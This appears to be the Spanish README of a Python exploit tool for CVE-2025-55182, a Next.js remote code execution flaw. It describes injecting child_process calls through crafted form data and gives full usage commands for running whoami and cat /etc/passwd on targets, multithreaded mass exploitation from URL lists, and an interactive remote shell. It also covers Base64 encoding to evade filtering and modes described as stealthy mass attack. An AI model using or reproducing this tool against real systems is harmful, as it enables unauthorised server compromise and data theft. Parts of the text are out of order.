
Exploit basado en Python para CVE-2025-55182 (RCE de Next.js) con escaneo de objetivos individuales/lotes, ejecución de comandos, shell interactivo y 4 modos de ataque con soporte de codificación Base64.
Esta herramienta está diseñada para detectar y explotar la vulnerabilidad CVE-2025-55182 (presumiblemente una vulnerabilidad de ejecución de código en un framework relacionado con Next.js). Admite detección masiva de un solo objetivo / múltiples objetivos, ejecución de comandos, shell interactiva y otras funciones. Proporciona 4 modos de ataque para adaptarse a diferentes escenarios, y admite configuración flexible como codificación Base64 de comandos, reenvío de proxy y salida de registros.
La vulnerabilidad CVE-2025-55182 puede existir en aplicaciones relacionadas con Next.js. Mediante la construcción de una solicitud maliciosa se modifica la lógica de ejecución en _response, inyectando la invocación del módulo child_process para lograr la ejecución remota de comandos (RCE). La herramienta envía datos de formulario especialmente diseñados para desencadenar la vulnerabilidad y devolver los resultados de la ejecución del comando.
requestspip install requests
# Ejecutar el comando whoami (Modo de ataque 1: con respuesta)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"
# Ejecutar comando del sistema (codificado en Base64 para evitar la interceptación de caracteres especiales)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b
# Modo de respuesta completa (decodifica el resultado devuelto en Base64)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4
# Leer URLs de destino desde un archivo y ejecutar el comando id de forma masiva (20 hilos)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log
# Conectar al objetivo y entrar en una línea de comandos interactiva (soporta cambio de codificación Base64)
python CVE-2025-55182-exploit.py -u https://target.com -s
# Capturar y analizar tráfico a través del proxy de Burp Suite
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080
| Parámetro | Abrev. | Obligatorio | Descripción | Ejemplo |
|---|---|---|---|---|
--url | -u | No | URL de un solo objetivo (excluyente con -l, se prefiere -u) | -u https://target.com |
--url-list | -l | No | Archivo de lista de URLs objetivo (una URL por línea, sin protocolo se añade automáticamente http/https) | -l urls.txt |
--payload | -p | No | Modo de ataque (por defecto: 1) 1=con respuesta(execSync) | 2=sin respuesta(execSync) 3=sin respuesta(exec) |
--cmd | -c | No | Comando del sistema a ejecutar (obligatorio en modo por lotes/comando único, excluyente con -s) | -c "whoami" o -c "dir" |
--threads | -t | No | Número de hilos para detección masiva (por defecto: 10, se recomienda no más de 50) | -t 20 |
--outlog | -o | No | Archivo de registro de salida (por defecto: cve-2025-55182.log) | -o exploit.log |
--base64 | -b | No | Codifica en Base64 el comando especificado en -c (evita la interceptación de caracteres especiales) | -c "cat /etc/passwd" -b |
--cmd-shell | -s | No | Modo shell interactivo (solo para objetivo único con -u, excluyente con -c) | -u https://target.com -s |
--proxy | - | No | Configuración de proxy (soporta proxy HTTP/HTTPS para captura o reenvío de tráfico) | --proxy http://127.0.0.1:8080 |
| Número de Modo | Descripción del Modo | Características | Escenario de Uso |
|---|---|---|---|
| 1 | Con respuesta (execSync) | Ejecuta el comando de forma síncrona, devuelve redirección 303, el resultado está en la cabecera de respuesta | Verificación rápida de la vulnerabilidad |
| 2 | Sin respuesta (execSync) | Ejecuta el comando de forma síncrona, sin resultado devuelto (se debe confirmar por otros medios) | Ejecución sigilosa |
| 3 | Sin respuesta (exec) | Ejecuta el comando de forma asíncrona, sin resultado devuelto (baja huella, adecuado para operaciones sin confirmación) | Ataque masivo sigiloso |
| 4 | Respuesta completa | Ejecuta el comando de forma síncrona, el resultado se devuelve codificado en Base64 en el cuerpo de la respuesta (la herramienta lo decodifica automáticamente) | Escenarios que requieren ver la salida completa |
Una vez en el modo -s, se admiten los siguientes comandos integrados:
| Comando | Descripción |
|---|---|
b64 | Cambiar al modo de comandos codificados en Base64 |
nob64 | Salir del modo de codificación Base64 |
exit | Salir del shell interactivo |
? | Ver ayuda |
--outlog para su posterior análisis;-u y -l son excluyentes; si se especifican ambos, se prefiere -u;-c y -s son excluyentes; en modo -s no es necesario especificar -c;-l no tiene protocolo (ej. target.com), la herramienta intentará automáticamente http:// y https://;https://target.com) para evitar fallos de conexión innecesarios;-b o b64, la herramienta maneja automáticamente la codificación/decodificación Base64, no es necesario hacerlo manualmente;--time-out para evitar falsos negativos.--skip-check para omitir la verificación;-p 4 modo de respuesta completa);-b) para evitar que el comando sea interceptado por el sistema objetivo;--time-out;http://target.com).Esta herramienta se utiliza únicamente para la investigación de seguridad cibernética y la verificación de vulnerabilidades. El usuario asume todas las consecuencias derivadas de la violación de la Ley de Seguridad Cibernética y otras leyes y regulaciones aplicables, y el desarrollador de la herramienta no se hace responsable.
--skip-check | - | No | Omite la verificación de conectividad del proxy (por defecto se verifica la disponibilidad del proxy) | --proxy http://127.0.0.1:8080 --skip-check |
--time-out | - | No | Tiempo de espera de solicitud (en segundos, por defecto: 10) | --time-out 15 |